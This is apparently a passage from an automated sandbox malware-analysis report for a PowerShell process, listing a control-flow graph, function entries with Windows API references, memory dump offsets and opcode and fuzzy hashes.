                                                                                              control_flow_graph 0 73aa858-73aa898 2 73aaece-73aaee5 0->2 3 73aa89e-73aa8b6 0->3 6 73aaeec-73aaf39 2->6 3->6 7 73aa8bc-73aa8e1 3->7 18 73aaf3b-73aaf4c 6->18 19 73aaf99-73aafa0 6->19 16 73aa8e3-73aa922 7->16 17 73aa927-73aa938 7->17 29 73aaebf-73aaecb 16->29 26 73aa93a-73aa93f 17->26 27 73aa944 17->27 18->19 23 73aaf4e-73aaf5f 18->23 23->19 31 73aaf61-73aaf72 23->31 26->29 172 73aa947 call 1024260 27->172 173 73aa947 call 1024270 27->173 31->19 37 73aaf74-73aaf85 31->37 32 73aa94c-73aa94e 34 73aa95a-73aa970 32->34 35 73aa950-73aa955 32->35 39 73aa97c-73aa984 34->39 40 73aa972-73aa977 34->40 35->29 37->19 43 73aaf87-73aaf98 37->43 44 73aa98a-73aa999 39->44 45 73aaa2c-73aaa33 39->45 40->29 46 73aa9ce-73aa9d2 44->46 47 73aaa39-73aaa51 45->47 48 73aaba2-73aabba 45->48 50 73aa9da-73aa9de 46->50 51 73aa9d4-73aa9d8 46->51 62 73aab96-73aab9d 47->62 63 73aaa57-73aaa5e 47->63 60 73aabbc-73aabc3 48->60 61 73aabd1-73aabd8 48->61 50->45 55 73aa9e0-73aaa27 50->55 51->50 54 73aa99b-73aa9af 51->54 54->46 55->29 60->61 65 73aabc5-73aabcc 60->65 66 73aabda-73aabe1 61->66 67 73aabe7-73aabee 61->67 70 73aaebc 62->70 68 73aaa68-73aaa70 63->68 69 73aaa60 63->69 65->70 66->67 71 73aad82-73aada3 66->71 72 73aabf8-73aac00 67->72 73 73aabf0 67->73 74 73aaa7e 68->74 75 73aaa72-73aaa7c 68->75 69->68 70->29 94 73aada9-73aadeb 71->94 95 73aae6f-73aae75 71->95 78 73aac0e 72->78 79 73aac02-73aac0c 72->79 73->72 76 73aaa83-73aaa85 74->76 75->76 80 73aaad3-73aaae8 76->80 81 73aaa87-73aaace 76->81 83 73aac13-73aac15 78->83 79->83 91 73aaaea-73aaaf8 80->91 92 73aab01-73aab05 80->92 81->29 85 73aac63-73aac78 83->85 86 73aac17-73aac5e 83->86 100 73aac7a-73aac8a 85->100 101 73aacb3-73aacbc 85->101 86->29 91->92 109 73aaafa 91->109 92->70 98 73aab0b-73aab1f 92->98 150 73aae1a-73aae1e 94->150 151 73aaded-73aae0b 94->151 95->70 99 73aae77-73aaeb5 95->99 118 73aab2c-73aab2f 98->118 119 73aab21-73aab26 98->119 99->70 114 73aac98-73aacae 100->114 115 73aac8c-73aac93 100->115 104 73aacbe-73aacd6 101->104 105 73aad33-73aad7d 101->105 132 73aacd8-73aace4 104->132 133 73aacec-73aad2e 104->133 105->70 109->92 114->70 115->70 118->98 122 73aab31-73aab34 118->122 119->118 128 73aab36-73aab39 122->128 129 73aab47-73aab91 122->129 128->129 135 73aab3b-73aab42 128->135 129->70 132->133 133->70 135->70 150->95 154 73aae20-73aae35 150->154 164 73aae0d 151->164 165 73aae14-73aae18 151->165 154->95 160 73aae37-73aae47 154->160 168 73aae49-73aae50 160->168 169 73aae52-73aae68 160->169 164->165 165->150 165->151 168->95 169->95 172->32 173->32
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8^Th$HJx$HJx$dlTh$dlTh$dlTh$dlTh$dlTh$dlTh$dlTh
                                                                                              • API String ID: 0-2825212099
                                                                                              • Opcode ID: 0157a47d9f6f8e279e2762629fd046228f5f2a2193f9bde28c8829fadf58ab43
                                                                                              • Instruction ID: 33d8faee38b71c5717951ac40aeb271d8d1c7cc4358015e78e03119fd0e9316d
                                                                                              • Opcode Fuzzy Hash: 0157a47d9f6f8e279e2762629fd046228f5f2a2193f9bde28c8829fadf58ab43
                                                                                              • Instruction Fuzzy Hash: 8D226AB5A10219EFEB24DF64D845AAEB7F2FF84314F008529E40A9B350DB75ED45CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01023FEC, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 010256C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.455621552.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_1020000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: e64ae95959f958d6a99b10deb14e4a15d616574978d30fbd13613457067090b5
                                                                                              • Instruction ID: 7be803d86f0d61beb158166d4a9919ab8a352441c95ae2220c64d42ce36fff90
                                                                                              • Opcode Fuzzy Hash: e64ae95959f958d6a99b10deb14e4a15d616574978d30fbd13613457067090b5
                                                                                              • Instruction Fuzzy Hash: B22133B5D046299BCB14CF9AD848BEEFBF4FB48224F10815AD819B7600D774A904CFE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01025650, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 010256C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.455621552.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_1020000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 8a4058fadab80885d20c77812815678f1abd08683a72c43927c6949b183ff106
                                                                                              • Instruction ID: 2ee43318df91c8b52f20b3af3ee09a27dcdb20bb2d7a19199da6881b659a24a5
                                                                                              • Opcode Fuzzy Hash: 8a4058fadab80885d20c77812815678f1abd08683a72c43927c6949b183ff106
                                                                                              • Instruction Fuzzy Hash: 042122B5D006599BCB14CF99D988ADEFBF4FB88224F14815AD818B7600C774AA04CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073B46B0, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlDecodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,073B4AFA), ref: 073B50E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462256851.00000000073B0000.00000040.00000010.sdmp, Offset: 073B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73b0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 3527080286-0
                                                                                              • Opcode ID: 54037fa07217d4b1bf9220736ee581c1c4b7a8bd20132be4e021911c6d26fdd6
                                                                                              • Instruction ID: 5082aafb382757449280740c3a9b6d08414ab7904725bd4cb33195ae3c83c478
                                                                                              • Opcode Fuzzy Hash: 54037fa07217d4b1bf9220736ee581c1c4b7a8bd20132be4e021911c6d26fdd6
                                                                                              • Instruction Fuzzy Hash: 5C1103B5804749CFDB20CF99D485BEEBBF8EB88214F10845AD519A7640D774A944CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073B5081, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlDecodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,073B4AFA), ref: 073B50E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462256851.00000000073B0000.00000040.00000010.sdmp, Offset: 073B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73b0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 3527080286-0
                                                                                              • Opcode ID: c70ed23d8f734b0dd0b8ccd94d9b8b92983edede55bc2fc665b96861fd700da8
                                                                                              • Instruction ID: 9f917887b77dc36b9cf3f86b5ba1969abbc02d254a09093cb97102ea54f83b7c
                                                                                              • Opcode Fuzzy Hash: c70ed23d8f734b0dd0b8ccd94d9b8b92983edede55bc2fc665b96861fd700da8
                                                                                              • Instruction Fuzzy Hash: 0F1133B5800749CFDB20CF99D484BEEFBF4EB89314F20841AD518A7640D774A940CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07532EF0, Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;>h
                                                                                              • API String ID: 0-2883881028
                                                                                              • Opcode ID: 82cfb5646c5518c8a0119ba12b75bfb070056302dc4808f47751ad2a57f6b4f3
                                                                                              • Instruction ID: de437f1fad2f6d0f77991dbd43b2a4c679d147e42a6f63708655755c725e7b1d
                                                                                              • Opcode Fuzzy Hash: 82cfb5646c5518c8a0119ba12b75bfb070056302dc4808f47751ad2a57f6b4f3
                                                                                              • Instruction Fuzzy Hash: 12113AB93046125BDB24A56A8441BBBA3C7FBC4715F54842AE545DB390CFB1D84283A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07532ED5, Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;>h
                                                                                              • API String ID: 0-2883881028
                                                                                              • Opcode ID: 915f004f5a74d856cef52f0de35f3a6cfb62b071ae76c91f541a62cb666d5565
                                                                                              • Instruction ID: dbec527060311aa736a129712c271529a92d205858b175d082d4e5e66e66d6c6
                                                                                              • Opcode Fuzzy Hash: 915f004f5a74d856cef52f0de35f3a6cfb62b071ae76c91f541a62cb666d5565
                                                                                              • Instruction Fuzzy Hash: 4D119CB43083912FD72116360C11BF7BB96FB86310F588067F940DB2D2DA74A8018371
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AAFF8, Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HJx
                                                                                              • API String ID: 0-3581959147
                                                                                              • Opcode ID: 5e19dd0ba9644711db95a8ae97910c98c75378a81fb79b4f9ad0e00b7858770c
                                                                                              • Instruction ID: fc30080e27f65922a282b1ad80c18fc5f191a40dc1917dd726881c3ecc8d1b60
                                                                                              • Opcode Fuzzy Hash: 5e19dd0ba9644711db95a8ae97910c98c75378a81fb79b4f9ad0e00b7858770c
                                                                                              • Instruction Fuzzy Hash: E7F08BB63063506FC326673474150AEB79A8FC662130A407BD809C7741CF28CC0387EA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 075334D8, Relevance: .9, Instructions: 926COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ff07f7e491468b76388913dbe694e042cf0cd14ecb12341ee34f7826628b906
                                                                                              • Instruction ID: 504486690ebcab8e6f27ccaaa9373b8881e78995cde67a2fc0ece0ecef146424
                                                                                              • Opcode Fuzzy Hash: 2ff07f7e491468b76388913dbe694e042cf0cd14ecb12341ee34f7826628b906
                                                                                              • Instruction Fuzzy Hash: 835235F57042528FDB159B6888106EABBE2BFC6225F14847BD546CF3A1DB35DC42C3A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 075346A8, Relevance: .9, Instructions: 877COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7bbbdf80629d21ee032e82933f260a6a7317f84737ca5eb2149b4dacfa38c7e3
                                                                                              • Instruction ID: f6a12d8b2d4ca57105e36382cdd0b56e44bbf563c264b87e2ea8c7b03b2ad28d
                                                                                              • Opcode Fuzzy Hash: 7bbbdf80629d21ee032e82933f260a6a7317f84737ca5eb2149b4dacfa38c7e3
                                                                                              • Instruction Fuzzy Hash: F75217B57042928FCB519B7888106BABBE2AFC6215F14C4BBD545CF3A1DB75CC42C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07535418, Relevance: .7, Instructions: 725COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7bdd480a0fd071c5a1194d153437ab54630d83497d9e656862b5e1f6feea9678
                                                                                              • Instruction ID: f77489aa00d88ed041f6266155be06b2c8693337012566d6ba50bb47a9fb8ee4
                                                                                              • Opcode Fuzzy Hash: 7bdd480a0fd071c5a1194d153437ab54630d83497d9e656862b5e1f6feea9678
                                                                                              • Instruction Fuzzy Hash: 21324AF57043528FCB15DB7888116AF7BA2BF81219B18946BD5068F3A2EF31DC51C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07531BF8, Relevance: .7, Instructions: 678COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cb100d44f1878854da3620b7ac1f13e412025c740aae9472f109d371232f3eb
                                                                                              • Instruction ID: 2300cced43add589169facc7a706a632aa0294f31da100a8b2f437c8f0dc1927
                                                                                              • Opcode Fuzzy Hash: 7cb100d44f1878854da3620b7ac1f13e412025c740aae9472f109d371232f3eb
                                                                                              • Instruction Fuzzy Hash: 4B223AB5704B168FCB119B7988106EEBBA2BFC6214F14846BD545CF2A1DB71C842C7B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07532428, Relevance: .7, Instructions: 667COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f822708e2de23c435bf5fb54f0ad133fb905b7f244e8ec3be417dc5fb1a458f
                                                                                              • Instruction ID: 9bdb7eb36d5abfc37b8a0766955149e69eada3b4c6d4a9089c62582f954a1f28
                                                                                              • Opcode Fuzzy Hash: 5f822708e2de23c435bf5fb54f0ad133fb905b7f244e8ec3be417dc5fb1a458f
                                                                                              • Instruction Fuzzy Hash: 842228B5B046428FDB109B6998506AAB7A2BFC6215F24C47FD546CF362DB31CC42C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AF2E0, Relevance: .2, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04c8901621f0cd5a06e2567ad1caddd53b0ea13e4e9db792beaff8d5098a3162
                                                                                              • Instruction ID: b9b6842311c9f737b6ab983685987bfbc16f6bad7ddae017014dcbf20bfd40c7
                                                                                              • Opcode Fuzzy Hash: 04c8901621f0cd5a06e2567ad1caddd53b0ea13e4e9db792beaff8d5098a3162
                                                                                              • Instruction Fuzzy Hash: 18B109B4E0021ADFDB14DFA8C484A9DBBB2FF88304F548569E409AB365DB71A945CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07531590, Relevance: .2, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 301fa4e1dc1ee66f57fdcacdc9156460471bb45986d9a3f21cdca19bfc48c821
                                                                                              • Instruction ID: 198824b13155449047ab1a3b95f97828d828b9d0e1d578d124e0131431fc7583
                                                                                              • Opcode Fuzzy Hash: 301fa4e1dc1ee66f57fdcacdc9156460471bb45986d9a3f21cdca19bfc48c821
                                                                                              • Instruction Fuzzy Hash: A861F7B5B00A0A9FCB50DA79C8006EAB7E5FBC5215F18C07BD51ACB261DB31DD42CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07535130, Relevance: .2, Instructions: 215COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8f551cb3afd5a606a260bfd3365856d81f96d6736004908103651b5d0a0d6541
                                                                                              • Instruction ID: ed8a84e2cf974b8c7f1e0851f812f89dc22d14ec5c0006a61a9f569fc429f814
                                                                                              • Opcode Fuzzy Hash: 8f551cb3afd5a606a260bfd3365856d81f96d6736004908103651b5d0a0d6541
                                                                                              • Instruction Fuzzy Hash: 256129B57042458FCB15DA788850AAAB7E2BFC6214F14D06BD846CF361EB718C66C7E2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AF2D0, Relevance: .2, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0a80c1533db0a212eda6a8eec353efe4f71820fa8f90d28bc545ba1c03e083aa
                                                                                              • Instruction ID: ee0ff1177b6d59ab81a69ed312861f05aec42a1d95f415c855cf3a3f614d0424
                                                                                              • Opcode Fuzzy Hash: 0a80c1533db0a212eda6a8eec353efe4f71820fa8f90d28bc545ba1c03e083aa
                                                                                              • Instruction Fuzzy Hash: 089117B4E00219DFDB14DFA9C884A9DBBF2FF88304F548569E409AB365CB71A945CF80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 075300F0, Relevance: .2, Instructions: 162COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1224013afa89ae0336324a43eca50199d7f5f45c304f026a03798cf608f4eaae
                                                                                              • Instruction ID: 49cfeb7086c5096f6da67a021109be6cb1e7191eb1da2f9a6618e6fce41de102
                                                                                              • Opcode Fuzzy Hash: 1224013afa89ae0336324a43eca50199d7f5f45c304f026a03798cf608f4eaae
                                                                                              • Instruction Fuzzy Hash: 1C51C9B5B143028FCF559AAD8810AAAB7E3BBC5254F54807FD41DCB2A1DB36C846C7D1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 075353F9, Relevance: .1, Instructions: 149COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c642395c9c34ec099a17c39271482c00552c88ebe39f1047743cda400134ed32
                                                                                              • Instruction ID: a0a20f7fdbcc043f2e07906afa38d10a3aed6c9f51b9e225ebe39acb4f4e6472
                                                                                              • Opcode Fuzzy Hash: c642395c9c34ec099a17c39271482c00552c88ebe39f1047743cda400134ed32
                                                                                              • Instruction Fuzzy Hash: 6C4128F0B003128FCB259F788D00AEA77E2BF85215B299467E9458F261EB71DC51C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073A2930, Relevance: .1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c5f0c36370e693450cda926bcae72c1ebc79f93d1b0cc7f85f91e8a6002b7062
                                                                                              • Instruction ID: e595316b0ccce019728219e173147a7ad4c0442c270a8fb4c0deb9007582aa8c
                                                                                              • Opcode Fuzzy Hash: c5f0c36370e693450cda926bcae72c1ebc79f93d1b0cc7f85f91e8a6002b7062
                                                                                              • Instruction Fuzzy Hash: D6419D76A006159FCB14DF69C940AEEB7F6FFC8310F108569E409AB361EB31AD45CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07531BD9, Relevance: .1, Instructions: 131COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 99d713677677eb67057a64a5786c78c2ab6e9188e25f18483b292d17155b8715
                                                                                              • Instruction ID: d13413ad1d9f9f49cff3991c5a3647ad965a7bd97ccfa62df7c48683e62fd21f
                                                                                              • Opcode Fuzzy Hash: 99d713677677eb67057a64a5786c78c2ab6e9188e25f18483b292d17155b8715
                                                                                              • Instruction Fuzzy Hash: 6541C5B0705F4A8FCB619F358910AEABBB2BF42744F1988A7D9059F261D731D881C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07531978, Relevance: .1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4d60d00f93059e9da1d3ab9d596c8df4e91003d1b9ee271f48225b01d8dad7ad
                                                                                              • Instruction ID: ef2c7ccf5530f81ae9a4704e5f86b8a596f76ff238d72c87e473b7da83dae5e3
                                                                                              • Opcode Fuzzy Hash: 4d60d00f93059e9da1d3ab9d596c8df4e91003d1b9ee271f48225b01d8dad7ad
                                                                                              • Instruction Fuzzy Hash: 4D4109B5B04A468FCB119B7988106EABBF2AFC6106F1584BBC456CB262DF35C845C7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AB088, Relevance: .1, Instructions: 117COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 737e30d71c58f4878c37fe30e3b35487567230b9657be743b10aaa29e8cc684b
                                                                                              • Instruction ID: 749e81b292094325932595d354bb5891c7b36973436fb45651e360227ae0200f
                                                                                              • Opcode Fuzzy Hash: 737e30d71c58f4878c37fe30e3b35487567230b9657be743b10aaa29e8cc684b
                                                                                              • Instruction Fuzzy Hash: AF41E271B00219EFDF58EF64C890AADB7B2FF84310F108569D9196B345EB35E945CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AB940, Relevance: .1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0d3a992e3306443d07e6a48d9604c22474290158080b0a404eeb22ea8f35f903
                                                                                              • Instruction ID: 1e2a1cf0688081648c90b2f36d4151e947a486c730e0f1357278fcacaa04b905
                                                                                              • Opcode Fuzzy Hash: 0d3a992e3306443d07e6a48d9604c22474290158080b0a404eeb22ea8f35f903
                                                                                              • Instruction Fuzzy Hash: E72157FA7006119F9714DB28D8D5D2AB7F6FB88221761866DE80A87320DA70EC01CA60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AB858, Relevance: .1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30ccbc381b3d8444087c6c32c562e360ba9115b14d4a37ceb26a0811676626b8
                                                                                              • Instruction ID: 98f1f1e5000e3c7d5d20138cf54510b13b16cb81be2257e5a903f8d670007121
                                                                                              • Opcode Fuzzy Hash: 30ccbc381b3d8444087c6c32c562e360ba9115b14d4a37ceb26a0811676626b8
                                                                                              • Instruction Fuzzy Hash: 59214AFA7006519F9714DF68D895D2AB7FAFF89621721856DE90A87361CB30EC01CA50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AE231, Relevance: .1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
